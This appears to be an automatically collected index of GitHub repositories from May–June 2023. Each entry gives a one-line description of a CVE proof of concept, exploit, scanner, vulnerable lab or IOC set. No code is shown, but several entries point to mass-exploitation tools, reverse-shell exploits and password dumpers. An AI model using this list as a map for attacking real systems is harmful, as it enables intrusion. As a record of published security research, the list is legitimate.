**cve-2023-summer-patch Proof Of Concept** : [b35363/cve-2023-summer-patch-poc](https://github.com/b35363/cve-2023-summer-patch-poc) create time: 2023-06-08T10:16:41Z

**CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Path Traversal or Remote Code Execution vulnerabilities in Apache 2.4.49 and 2.4.50** : [cybfar/cve-2021-42013-httpd](https://github.com/cybfar/cve-2021-42013-httpd) create time: 2023-06-08T08:49:15Z

**no description** : [axelbankole/CVE-2012-1495-Webcalendar-](https://github.com/axelbankole/CVE-2012-1495-Webcalendar-) create time: 2023-06-08T07:21:14Z

**This is a reproduction of PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) vulnerability** : [Sybelle03/CVE-2021-43617](https://github.com/Sybelle03/CVE-2021-43617) create time: 2023-06-08T08:05:36Z

**This is a dockerized reproduction of the MotoCMS SQL injection (cf exploit db)** : [Sybelle03/CVE-2023-51504](https://github.com/Sybelle03/CVE-2023-51504) create time: 2023-06-08T07:37:08Z

**RocketMQ RCE (CVE-2023-33246) woodpecker 利用插件** : [v0ita/rocketMq_RCE](https://github.com/v0ita/rocketMq_RCE) create time: 2023-06-05T09:23:25Z

**no description** : [CKevens/CVE-2023-23638-Tools](https://github.com/CKevens/CVE-2023-23638-Tools) create time: 2023-06-08T05:14:01Z

**CVE-2023-21971 Connector/J RCE Analysis分析** : [Avento/CVE-2023-21971_Analysis](https://github.com/Avento/CVE-2023-21971_Analysis) create time: 2023-06-08T03:05:54Z

**Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection** : [cybfar/CVE-2023-23488-pmpro-2.8](https://github.com/cybfar/CVE-2023-23488-pmpro-2.8) create time: 2023-06-07T17:30:25Z

**An investigation into CVE-2023-34362.** : [hheeyywweellccoommee/CVE-2023-34362-nhjxn](https://github.com/hheeyywweellccoommee/CVE-2023-34362-nhjxn) create time: 2023-06-07T04:00:35Z

**Arbitrary File Delete Elevation of Privilege through Operating System Check of HP Support Assistant** : [sp3arm4n/Stolen-CVE-2022](https://github.com/sp3arm4n/Stolen-CVE-2022) create time: 2022-12-13T15:48:21Z

**CVE-2022-39227 : Proof of Concept** : [user0x1337/CVE-2022-39227](https://github.com/user0x1337/CVE-2022-39227) create time: 2023-06-07T11:11:12Z

**Test de vulnérabilité du CVE 2022–25765 : pdfkit v0.8.7.2 - Command Injection** : [GrandNabil/testpdfkit](https://github.com/GrandNabil/testpdfkit) create time: 2023-06-07T09:58:49Z

**Spring rce environment for CVE-2022-22965** : [dbgee/Spring4Shell](https://github.com/dbgee/Spring4Shell) create time: 2023-06-07T09:02:50Z

**no description** : [a-bazi/test-CVE-2023-29325](https://github.com/a-bazi/test-CVE-2023-29325) create time: 2023-06-07T07:51:59Z

**Apache RocketMQ 漏洞利用工具** : [hheeyywweellccoommee/CVE-2023-33246-rnkku](https://github.com/hheeyywweellccoommee/CVE-2023-33246-rnkku) create time: 2023-06-07T01:01:26Z

**SCM Manager XSS** : [CKevens/CVE-2023-33829-POC](https://github.com/CKevens/CVE-2023-33829-POC) create time: 2023-06-07T04:20:54Z

**An investigation into CVE-2023-34362.** : [a3cipher/CVE-2023-34362](https://github.com/a3cipher/CVE-2023-34362) create time: 2023-06-07T03:32:00Z

**no description** : [ahickmansec/CVE-2023-28178-patch](https://github.com/ahickmansec/CVE-2023-28178-patch) create time: 2023-06-06T17:43:51Z

**CVE-2023-34362-IOCs. More information on Deep Instinct's blog site.** : [deepinstinct/MOVEit_CVE-2023-34362_IOCs](https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs) create time: 2023-06-06T15:33:49Z

**CVE-2023-25157 - GeoServer SQL Injection - PoC** : [win3zz/CVE-2023-25157](https://github.com/win3zz/CVE-2023-25157) create time: 2023-06-06T14:05:09Z

**Apache RocketMQ 漏洞利用工具** : [Serendipity-Lucky/CVE-2023-33246](https://github.com/Serendipity-Lucky/CVE-2023-33246) create time: 2023-06-06T11:24:40Z

**Read more at Medium** : [mnqazi/CVE-2023-33977](https://github.com/mnqazi/CVE-2023-33977) create time: 2023-06-01T13:10:31Z

**Python 2.7** : [Jenderal92/WP-CVE-2023-2732](https://github.com/Jenderal92/WP-CVE-2023-2732) create time: 2023-06-06T02:59:22Z

**no description** : [MrDottt/CVE-2021-22911](https://github.com/MrDottt/CVE-2021-22911) create time: 2023-06-05T22:26:26Z

**On May 23, 2023 GitLab released version 16.0.1 which fixed a critical vulnerability, CVE-2023-2825, affecting the Community Edition (CE) and Enterprise Edition (EE) version 16.0.0. The vulnerability allows unauthenticated users to read arbitrary files through a path traversal bug.** : [EmmanuelCruzL/CVE-2023-2825](https://github.com/EmmanuelCruzL/CVE-2023-2825) create time: 2023-06-05T18:16:51Z

**no description** : [hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650](https://github.com/hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650) create time: 2023-06-05T17:40:59Z

**no description** : [Skr11lex/CVE-2023-33477](https://github.com/Skr11lex/CVE-2023-33477) create time: 2023-06-05T16:40:00Z

**PoC for login with password hash in STARFACE** : [RedTeamPentesting/CVE-2023-33243](https://github.com/RedTeamPentesting/CVE-2023-33243) create time: 2023-05-26T08:32:38Z

**no description** : [narrowinxt/CVE-2019-17558](https://github.com/narrowinxt/CVE-2019-17558) create time: 2023-06-05T07:47:01Z

**no description** : [Adelittle/CVE-2021-4191_Exploits](https://github.com/Adelittle/CVE-2021-4191_Exploits) create time: 2023-06-05T04:08:45Z

**no description** : [hqdat809/CVE-2021-40444](https://github.com/hqdat809/CVE-2021-40444) create time: 2023-06-05T02:27:21Z

**Base64-based encryption oracle exploit for CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler)** : [cehamod/UI_CVE-2017-9248](https://github.com/cehamod/UI_CVE-2017-9248) create time: 2023-06-05T00:48:24Z

**no description** : [hoangprod/CVE-2021-31956-POC](https://github.com/hoangprod/CVE-2021-31956-POC) create time: 2023-06-05T00:03:10Z

**POC code WIP Not complete, check future pushes for completion note. Practice for OSEE exam.** : [hoangprod/CVE-2021-31956](https://github.com/hoangprod/CVE-2021-31956) create time: 2023-06-04T22:51:09Z

**Re-write of original KeePass 2.X Master Password Dumper (CVE-2023-32784) POC in python.** : [hau-zy/KeePass-dump-py](https://github.com/hau-zy/KeePass-dump-py) create time: 2023-06-04T08:24:15Z

**Poc&Exp,支持批量扫描,反弹shell** : [BKLockly/CVE-2022-22965](https://github.com/BKLockly/CVE-2022-22965) create time: 2023-06-03T16:39:50Z

**Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013)** : [0xGabe/Apache-CVEs](https://github.com/0xGabe/Apache-CVEs) create time: 2023-06-03T22:59:20Z

**The script is designed to facilitate testing and exploration of the IKEv2 protocol in vulnerable devices, based on Rapid7's exploitation techniques.** : [WhiteOwl-Pub/PoC-CVE-2023-28771](https://github.com/WhiteOwl-Pub/PoC-CVE-2023-28771) create time: 2023-06-03T15:40:50Z

**no description** : [e23e/CVE-2023-31606](https://github.com/e23e/CVE-2023-31606) create time: 2023-06-03T14:13:48Z

**CVE-2023-25136_POC** : [axylisdead/CVE-2023-25136_POC](https://github.com/axylisdead/CVE-2023-25136_POC) create time: 2023-06-03T12:36:42Z

**no description** : [s0tr/CVE-2023-33781](https://github.com/s0tr/CVE-2023-33781) create time: 2023-06-03T11:47:02Z

**no description** : [s0tr/CVE-2023-33782](https://github.com/s0tr/CVE-2023-33782) create time: 2023-06-03T11:24:29Z

**Discord 0-day exploit** : [RShahHSCS/Discord-0-Day-Exploit](https://github.com/RShahHSCS/Discord-0-Day-Exploit) create time: 2023-06-02T18:19:22Z

**Information about Progress MoveIT CVE** : [NCSC-NL/Progress-MoveIT-CVE-2023](https://github.com/NCSC-NL/Progress-MoveIT-CVE-2023) create time: 2023-06-02T12:27:42Z

**Windows ZTE Loader CVE-2014-2321 Requires ZMAP For Windows Or BigEar** : [injectionmethod/Windows-ZTE-Loader](https://github.com/injectionmethod/Windows-ZTE-Loader) create time: 2023-06-02T06:17:04Z

**no description** : [Thirukrishnan/CVE-2023-33410](https://github.com/Thirukrishnan/CVE-2023-33410) create time: 2023-06-02T06:18:01Z

**no description** : [Thirukrishnan/CVE-2023-33409.](https://github.com/Thirukrishnan/CVE-2023-33409.) create time: 2023-06-02T06:09:05Z

**no description** : [Thirukrishnan/CVE-2023-33408](https://github.com/Thirukrishnan/CVE-2023-33408) create time: 2023-06-02T05:30:25Z

**The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin** : [tegal1337/CVE-2022-0441](https://github.com/tegal1337/CVE-2022-0441) create time: 2023-06-02T01:53:32Z

**CVE-2023-33246:Apache RocketMQ 远程命令执行漏洞检测工具** : [CKevens/CVE-2023-33246](https://github.com/CKevens/CVE-2023-33246) create time: 2023-06-02T01:41:12Z

**CVE-2023-33381: OS command injection on MitraStar GPT-2741GNAC** : [duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC](https://github.com/duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC) create time: 2023-05-31T22:30:20Z

**CVE-2023-29489-XSS** : [Abdullah7-ma/CVE-2023-29489](https://github.com/Abdullah7-ma/CVE-2023-29489) create time: 2023-06-01T18:13:17Z

**CVE-2023-33246 RocketMQ RCE Exploit** : [Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT) create time: 2023-06-01T14:48:26Z

**Este repositório server como prova de conceito para a vulnerabilidade CVE-2022-0778 do OpenSSL** : [Mrlucas5550100/PoC-CVE-2022-0778-](https://github.com/Mrlucas5550100/PoC-CVE-2022-0778-) create time: 2023-06-01T12:23:54Z

**A simple python script for a firewall rule that blocks incoming requests based on the Spring4Shell (CVE-2022-22965) vulnerability** : [bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-](https://github.com/bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-) create time: 2023-05-31T12:04:25Z

**[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure** : [redrays-io/CVE-2021-33690](https://github.com/redrays-io/CVE-2021-33690) create time: 2023-06-01T08:49:55Z

**Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246) Exploit** : [SuperZero/CVE-2023-33246](https://github.com/SuperZero/CVE-2023-33246) create time: 2023-06-01T06:27:09Z

**Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246) Exploit** : [Le1a/CVE-2023-33246](https://github.com/Le1a/CVE-2023-33246) create time: 2023-06-01T02:17:20Z

**Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.** : [FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1](https://github.com/FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1) create time: 2023-05-31T23:35:17Z

**no description** : [tucommenceapousser/CVE-2022-29455-mass](https://github.com/tucommenceapousser/CVE-2022-29455-mass) create time: 2023-06-01T01:44:45Z

**no description** : [tucommenceapousser/CVE-2022-29455](https://github.com/tucommenceapousser/CVE-2022-29455) create time: 2023-06-01T01:40:08Z

**no description** : [sk3w/cve-2023-28244](https://github.com/sk3w/cve-2023-28244) create time: 2023-05-31T16:43:34Z

**Stored XSS vulnerability in Teampass < 3.0.9 (Bypass of CVE-2023–2516) — M Nadeem Qazi** : [mnqazi/CVE-2023-3009](https://github.com/mnqazi/CVE-2023-3009) create time: 2023-05-31T16:23:23Z

**Zero-day Vulnerability in ZKTEco biometric fingerprint reader.** : [HritikThapa7/CVE-2023-31711](https://github.com/HritikThapa7/CVE-2023-31711) create time: 2023-02-16T04:27:52Z

**WooCommerce Payments: Unauthorized Admin Access Exploit** : [gbrsh/CVE-2023-28121](https://github.com/gbrsh/CVE-2023-28121) create time: 2023-03-30T23:50:39Z

**no description** : [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489) create time: 2023-05-31T11:56:48Z

**no description** : [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old) create time: 2023-05-31T11:22:01Z

**no description** : [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490) create time: 2023-05-31T10:45:35Z

**no description** : [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456) create time: 2023-05-31T10:07:10Z

**no description** : [Trinadh465/frameworks_base_CVE-2022-20493](https://github.com/Trinadh465/frameworks_base_CVE-2022-20493) create time: 2023-05-31T09:18:01Z

**no description** : [yizhimanpadewoniu/CVE-2023-33246-Copy](https://github.com/yizhimanpadewoniu/CVE-2023-33246-Copy) create time: 2023-05-31T07:28:46Z

**no description** : [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492) create time: 2023-05-31T07:07:40Z

**Verificador de Vulnerabilidade CVE-2020-35489 em Sites Wordpress** : [reneoliveirajr/wp_CVE-2020-35489_checker](https://github.com/reneoliveirajr/wp_CVE-2020-35489_checker) create time: 2023-05-31T02:12:26Z

**CVE-2023-2732 Mass** : [domainhigh/CVE-2023-2732-Mass](https://github.com/domainhigh/CVE-2023-2732-Mass) create time: 2023-05-31T02:43:11Z

**no description** : [dbrumley/extract75-cve-2020-13995](https://github.com/dbrumley/extract75-cve-2020-13995) create time: 2023-05-31T00:47:22Z

**CVE-2023-33733 reportlab RCE** : [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733) create time: 2023-05-30T22:22:50Z

**no description** : [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733) create time: 2023-05-30T22:09:47Z

**CVE-2020-0601: Windows CryptoAPI Vulnerability. (CurveBall/ChainOfFools)** : [Hans-MartinHannibalLauridsen/CurveBall](https://github.com/Hans-MartinHannibalLauridsen/CurveBall) create time: 2020-01-23T18:26:48Z

**no description** : [sahiloj/CVE-2023-33733](https://github.com/sahiloj/CVE-2023-33733) create time: 2023-05-30T18:36:03Z

**no description** : [sahiloj/CVE-2023-33731](https://github.com/sahiloj/CVE-2023-33731) create time: 2023-05-30T17:58:38Z

**no description** : [sahiloj/CVE-2023-33730](https://github.com/sahiloj/CVE-2023-33730) create time: 2023-05-30T16:22:59Z

**no description** : [Sp4ceDogy/CVE-2019-9053.python3](https://github.com/Sp4ceDogy/CVE-2019-9053.python3) create time: 2023-05-30T14:21:43Z

**no description** : [nguyendinhmanh1111/CVE2023](https://github.com/nguyendinhmanh1111/CVE2023) create time: 2023-05-30T12:57:00Z

**no description** : [Trinadh465/frameworks_base_CVE-2022-20493](https://github.com/Trinadh465/frameworks_base_CVE-2022-20493) create time: 2023-05-30T12:16:35Z

**no description** : [kw3h4/CVE-2023-21839-metasploit-scanner](https://github.com/kw3h4/CVE-2023-21839-metasploit-scanner) create time: 2023-05-29T02:08:37Z

**the proof of concept written in Python for an unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups. This is a critical severity issue** : [Tornad0007/CVE-2023-2825-Gitlab](https://github.com/Tornad0007/CVE-2023-2825-Gitlab) create time: 2023-05-30T07:03:19Z

**no description** : [I5N0rth/CVE-2023-33246](https://github.com/I5N0rth/CVE-2023-33246) create time: 2023-05-30T02:18:29Z

**The exploit is edited to work with different text encodings and Python 3 and is compatible with CMSMS version 2.2.9 and below.** : [Mahamedm/CVE-2019-9053-Exploit-Python-3](https://github.com/Mahamedm/CVE-2019-9053-Exploit-Python-3) create time: 2023-05-29T17:59:09Z

**SQL Injection vulnerability found in Fighting Cock Information System v1.0 allows a remote attacker to obtain sensitive information via the edit_breed.php parameter** : [gabesolomon/CVE-2021-31233](https://github.com/gabesolomon/CVE-2021-31233) create time: 2023-05-29T14:38:58Z

**Identifies domains which run WordPress and tests against vulnerabilities (CVE-2023-32243) / #VU76395 / etc...** : [thatonesecguy/Wordpress-Vulnerability-Identification-Scripts](https://github.com/thatonesecguy/Wordpress-Vulnerability-Identification-Scripts) create time: 2023-05-29T11:42:35Z

**no description** : [kai-iszz/CVE-2023-30212](https://github.com/kai-iszz/CVE-2023-30212) create time: 2023-05-29T08:23:34Z

**WindowsProtocolTestSuites is to trigger BSoD, and full exploit poc.** : [Ajomix/CVE-2020-0796](https://github.com/Ajomix/CVE-2020-0796) create time: 2023-05-29T06:31:51Z

**WindowsProtocolTestSuites is to trigger BSoD, and full exploit poc.** : [Ajomix/CVE-2020-0796](https://github.com/Ajomix/CVE-2020-0796) create time: 2023-05-29T06:20:49Z

**WindowsProtocolTestSuites is to trigger BSoD, and full exploit poc.** : [hheeyywweellccoommee/CVE-2020-0796-POC-dmglv](https://github.com/hheeyywweellccoommee/CVE-2020-0796-POC-dmglv) create time: 2023-05-27T01:01:18Z

**PowerJob V4.3.1 Unauthorized Vulnerability Exploit** : [Le1a/CVE-2023-29923](https://github.com/Le1a/CVE-2023-29923) create time: 2023-05-29T05:48:35Z

**CVE-2023-2825 list** : [yuimarudev/CVE-2023-2825](https://github.com/yuimarudev/CVE-2023-2825) create time: 2023-05-28T02:14:37Z

**Exploit for Bad Binder** : [elbiazo/CVE-2019-2215](https://github.com/elbiazo/CVE-2019-2215) create time: 2023-05-27T20:12:18Z

**Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)** : [0xkol/badspin](https://github.com/0xkol/badspin) create time: 2023-03-23T10:25:59Z

**MinIO Information Disclosure Vulnerability scanner by metasploit** : [TaroballzChen/CVE-2023-28432-metasploit-scanner](https://github.com/TaroballzChen/CVE-2023-28432-metasploit-scanner) create time: 2023-05-27T14:55:07Z

**Perfom With Massive Authentication Bypass In PaperCut MF/NG** : [Pari-Malam/CVE-2023-27350](https://github.com/Pari-Malam/CVE-2023-27350) create time: 2023-05-27T11:32:35Z

**Exploit-the-CVE-2023-30212-vulnerability** : [libasv/Exploite-CVE-2023-30212-vulnerability](https://github.com/libasv/Exploite-CVE-2023-30212-vulnerability) create time: 2023-05-27T09:52:54Z

**Vulnerable Docker Environment CVE-2023-30212** : [libas7994/Exploit-the-CVE-2023-30212-vulnerability](https://github.com/libas7994/Exploit-the-CVE-2023-30212-vulnerability) create time: 2023-05-27T09:29:41Z

**Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks** : [libasmon/-CVE-2023-30212-Vulnerability](https://github.com/libasmon/-CVE-2023-30212-Vulnerability) create time: 2023-05-27T06:43:44Z

**Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks** : [libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212](https://github.com/libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212) create time: 2023-05-27T05:06:17Z

**Docker environment and exploit the CVE-2023-30212 vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks** : [libasmon/Vulnerable-Docker-Environment-CVE-2023-30212](https://github.com/libasmon/Vulnerable-Docker-Environment-CVE-2023-30212) create time: 2023-05-27T04:53:28Z

**Docker environment and exploit the CVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0 .This vulnerability allows for Cross-Site Scripting (XSS) attacks** : [libas7994/CVE-2023-30212](https://github.com/libas7994/CVE-2023-30212) create time: 2023-05-27T04:24:12Z

**no description** : [tucommenceapousser/CVE-2023-33617](https://github.com/tucommenceapousser/CVE-2023-33617) create time: 2023-05-26T22:19:40Z

**Authenticated OS command injection vulnerability (CVE-2023-33617)** : [Chocapikk/CVE-2023-33617](https://github.com/Chocapikk/CVE-2023-33617) create time: 2023-05-26T22:16:00Z

**no description** : [Anandhu990/CVE-2023-30212_lab](https://github.com/Anandhu990/CVE-2023-30212_lab) create time: 2023-05-26T20:04:17Z

**no description** : [Anandhu990/CVE-2023-30212-iab](https://github.com/Anandhu990/CVE-2023-30212-iab) create time: 2023-05-26T19:38:09Z

**no description** : [Anandhu990/r-CVE-2023-30212--lab](https://github.com/Anandhu990/r-CVE-2023-30212--lab) create time: 2023-05-26T19:16:26Z

**no description** : [Anandhu990/r-CVE-2023-30212-lab](https://github.com/Anandhu990/r-CVE-2023-30212-lab) create time: 2023-05-26T19:14:53Z

**WindowsProtocolTestSuites is to trigger BSoD, and full exploit poc.** : [Ajomix/CVE-2020-0796-POC](https://github.com/Ajomix/CVE-2020-0796-POC) create time: 2023-05-26T19:11:24Z

**analyze ndays in VCS** : [hheeyywweellccoommee/CVE-2020-0796-VCS-mzecv](https://github.com/hheeyywweellccoommee/CVE-2020-0796-VCS-mzecv) create time: 2023-05-26T01:00:54Z

**Django修复文件上传验证绕过漏洞(CVE-2023-31047)不完全,同一接口处可绕过验证导致rce** : [hheeyywweellccoommee/Django_rce-nwvba](https://github.com/hheeyywweellccoommee/Django_rce-nwvba) create time: 2023-05-25T01:00:50Z

**Spring Cloud Gateway Actuator API SpEL表达式注入命令执行Exp** : [Le1a/CVE-2022-22947](https://github.com/Le1a/CVE-2022-22947) create time: 2023-05-26T11:52:22Z

**GitHub repository with Dockerfile and files to create a vulnerable environment for CVE-2023-30212, enabling exploration of the exploitability of this security vulnerability. Ideal for research and security enthusiasts to study and understand the impact of the vulnerability in a controlled setting.** : [mallutrojan/CVE-2023-30212-Lab](https://github.com/mallutrojan/CVE-2023-30212-Lab) create time: 2023-05-26T09:33:23Z

**Script of Network Security Project - Attack on CVE-2021-22555** : [masjohncook/netsec-project](https://github.com/masjohncook/netsec-project) create time: 2023-05-10T15:30:32Z

**no description** : [tucommenceapousser/CVE-2023-25292](https://github.com/tucommenceapousser/CVE-2023-25292) create time: 2023-05-25T20:56:01Z

**Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function** : [nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963](https://github.com/nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963) create time: 2023-05-25T19:50:38Z

**analyze ndays in VCS** : [Ajomix/CVE-2020-0796-VCS](https://github.com/Ajomix/CVE-2020-0796-VCS) create time: 2023-05-25T17:22:36Z

**This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.** : [Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE) create time: 2023-05-25T16:23:47Z

**no description** : [kuttappu123/CVE-2023-30212-LAB](https://github.com/kuttappu123/CVE-2023-30212-LAB) create time: 2023-05-25T15:04:34Z

**GitLab CVE-2023-2825 Checker** : [Occamsec/CVE-2023-2825](https://github.com/Occamsec/CVE-2023-2825) create time: 2023-05-25T13:25:10Z

**no description** : [paragbagul111/CVE-2023-30145.](https://github.com/paragbagul111/CVE-2023-30145.) create time: 2023-05-25T12:35:27Z

**MStore API <= 3.9.2 - Authentication Bypass** : [RandomRobbieBF/CVE-2023-2732](https://github.com/RandomRobbieBF/CVE-2023-2732) create time: 2023-05-25T10:18:48Z

**Proof of Concept about a XSS Stored in SCM Manager 1.2 <= 1.60** : [n3gox/CVE-2023-33829](https://github.com/n3gox/CVE-2023-33829) create time: 2023-05-19T13:11:50Z

**PowerJob <=4.3.2 未授权访问漏洞检测工具(CVE-2023-29922)** : [CKevens/CVE-2023-29923-Scan](https://github.com/CKevens/CVE-2023-29923-Scan) create time: 2023-05-25T02:24:51Z

**Web application vulnerable to Python3 Flask SSTI (CVE-2019-8341)** : [adindrabkin/llama_facts](https://github.com/adindrabkin/llama_facts) create time: 2021-12-24T04:08:44Z

**Vulnerable docker to test for: CVE-2023-32243** : [YouGina/CVE-2023-32243](https://github.com/YouGina/CVE-2023-32243) create time: 2023-05-24T19:50:27Z

**no description** : [msd0pe-1/CVE-2023-31747_filmora-unquoted](https://github.com/msd0pe-1/CVE-2023-31747_filmora-unquoted) create time: 2023-04-24T16:36:09Z

**Exploit and report for CVE-2023-32163** : [LucaBarile/ZDI-CAN-16857](https://github.com/LucaBarile/ZDI-CAN-16857) create time: 2022-08-17T21:01:21Z

**Exploits and reports for CVE-2023-32162** : [LucaBarile/ZDI-CAN-16318](https://github.com/LucaBarile/ZDI-CAN-16318) create time: 2022-02-01T21:23:32Z

**CVE-2023-2859 Medium Blog** : [mnqazi/CVE-2023-2859](https://github.com/mnqazi/CVE-2023-2859) create time: 2023-05-24T10:46:34Z

**CVE-2023-2591 Medium blog** : [mnqazi/CVE-2023-2591](https://github.com/mnqazi/CVE-2023-2591) create time: 2023-05-24T10:45:22Z

**Medium Blog** : [mnqazi/CVE-2023-2516](https://github.com/mnqazi/CVE-2023-2516) create time: 2023-05-24T10:44:52Z

**Django修复文件上传验证绕过漏洞(CVE-2023-31047)不完全,同一接口处可绕过验证导致rce** : [xzsec/Django_rce](https://github.com/xzsec/Django_rce) create time: 2023-05-24T07:47:40Z

**IC Realtime ICIP-P2012T is vulnerable to Incorrect Access Control via an open port** : [Yozarseef95/CVE-2023-31595](https://github.com/Yozarseef95/CVE-2023-31595) create time: 2023-05-24T04:32:19Z

**IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control** : [Yozarseef95/CVE-2023-31594](https://github.com/Yozarseef95/CVE-2023-31594) create time: 2023-05-24T04:09:24Z

**no description** : [tucommenceapousser/CVE-2019-19492-2](https://github.com/tucommenceapousser/CVE-2019-19492-2) create time: 2023-05-23T22:56:18Z

**no description** : [tucommenceapousser/CVE-2019-19492](https://github.com/tucommenceapousser/CVE-2019-19492) create time: 2023-05-23T20:14:33Z

**FreeSWITCH Exploit (CVE-2019-19492)** : [Chocapikk/CVE-2019-19492](https://github.com/Chocapikk/CVE-2019-19492) create time: 2023-05-23T19:53:54Z

**A CVE-2023-32784 proof-of-concept implementation in Rust** : [LeDocteurDesBits/cve-2023-32784](https://github.com/LeDocteurDesBits/cve-2023-32784) create time: 2023-05-23T20:02:22Z

**CVE 2019-9053 Python 3 Update** : [AppyAppy/super-octo-carnival](https://github.com/AppyAppy/super-octo-carnival) create time: 2023-05-23T18:44:08Z

**no description** : [manavvedawala/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala/CVE-2023-32243-proof-of-concept) create time: 2023-05-23T18:38:27Z

**no description** : [manavvedawala/CVE-2023-32243-POC](https://github.com/manavvedawala/CVE-2023-32243-POC) create time: 2023-05-23T18:36:42Z

**Mass CVE-2023-32243** : [domainhigh/Mass-CVE-2023-32243](https://github.com/domainhigh/Mass-CVE-2023-32243) create time: 2023-05-23T16:22:41Z

**Dockerized POC for CVE-2022-42889 Text4Shell** : [aaronm-sysdig/text4shell-docker](https://github.com/aaronm-sysdig/text4shell-docker) create time: 2023-05-22T06:57:55Z

**no description** : [jet-pentest/CVE-2023-31779](https://github.com/jet-pentest/CVE-2023-31779) create time: 2023-05-23T07:58:03Z

**no description** : [J6451/CVE-2023-31726](https://github.com/J6451/CVE-2023-31726) create time: 2023-05-23T06:29:03Z

**no description** : [J6451/CVE-2023-31726](https://github.com/J6451/CVE-2023-31726) create time: 2023-05-23T06:18:40Z

**CVE-2023-29922 Batch detection script** : [1820112015/CVE-2023-29923](https://github.com/1820112015/CVE-2023-29923) create time: 2023-05-23T06:06:50Z

**no description** : [J6451/CVE-2023-31726](https://github.com/J6451/CVE-2023-31726) create time: 2023-05-23T03:41:21Z

**PoC for CVE-2023-28771 based on Rapid7's excellent writeup** : [BenHays142/CVE-2023-28771-PoC](https://github.com/BenHays142/CVE-2023-28771-PoC) create time: 2023-05-23T02:37:39Z

**This little script encrypts password to gpp cpassword. It useful to create vulnerable lab AD (CVE-2014-1812).** : [mauricelambert/gpp-encrypt](https://github.com/mauricelambert/gpp-encrypt) create time: 2023-05-22T21:22:38Z

**Ce script permet d'effectuer une énumération des utilisateurs SSH sur un système cible. Il utilise une technique de manipulation des paquets SSH pour déterminer quels noms d'utilisateurs sont valides.** : [m-kis/ssh-enum-cve2018-15473](https://github.com/m-kis/ssh-enum-cve2018-15473) create time: 2023-05-22T11:41:43Z

**vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption** : [antogit-sys/CVE-2007-5962](https://github.com/antogit-sys/CVE-2007-5962) create time: 2023-05-22T07:57:44Z

**CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability.** : [dhmosfunk/CVE-2023-25690-POC](https://github.com/dhmosfunk/CVE-2023-25690-POC) create time: 2023-05-22T03:06:31Z

**Simple flask application to implement an intentionally vulnerable web app to demo CVE-2023-2822.** : [cberman/CVE-2023-2822-demo](https://github.com/cberman/CVE-2023-2822-demo) create time: 2023-05-22T00:46:24Z

**KeePass 2.X dumper (CVE-2023-32784)** : [z-jxy/keepass_dump](https://github.com/z-jxy/keepass_dump) create time: 2023-05-22T00:11:42Z

**Unauthenticated Remote Code Execution in PyLoad <0.5.0b3.dev31** : [JacobEbben/CVE-2023-0297](https://github.com/JacobEbben/CVE-2023-0297) create time: 2023-05-21T17:09:05Z

